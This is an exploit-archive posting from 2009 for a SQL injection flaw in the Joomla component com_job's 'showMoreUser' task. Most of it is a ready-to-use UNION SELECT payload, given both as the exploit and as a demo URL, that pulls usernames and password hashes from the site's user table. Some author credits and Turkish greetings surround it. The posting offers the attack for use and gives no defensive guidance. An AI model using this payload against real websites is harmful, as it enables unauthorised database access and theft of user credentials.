Joomla! Component com_job - 'showMoreUse' SQL Injection



EKU-ID: 17925 CVE: OSVDB-ID:
Author: Palyo34 Published: 2009-12-08 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home 


/**************************************************************************

[!] Joomla Component com_job ( showMoreUse) SQL injection vulnerability
[!] Author  : Palyo34
[!] Homepage: http://www.1923turk.biz
[!] Date    : 12 08, 2009

**************************************************************************/
[+] Manas58
[+] Topunuzun a.q
[+] aponun picleri
[+]
[+]
[+] 7 KAHRAMAN fiEH›D›M›Z› SAYGIYLA ANIYORUZ ALLAH RAHMET EYLES›N





===========================================================================



http://server/index.php?option=com_job&task=showMoreUser&id=[SQL]

[ Exploit ]

index.php?option=com_job&task=showMoreUser&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(username,0x3a,password),17,18,19,20,21,22,23,24,25+from+kew_users--

[ Demo ]

http://www.site.com/index.php?option=com_job&task=showMoreUser&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(username,0x3a,password),17,18,19,20,21,22,23,24,25+from+kew_users--


===========================================================================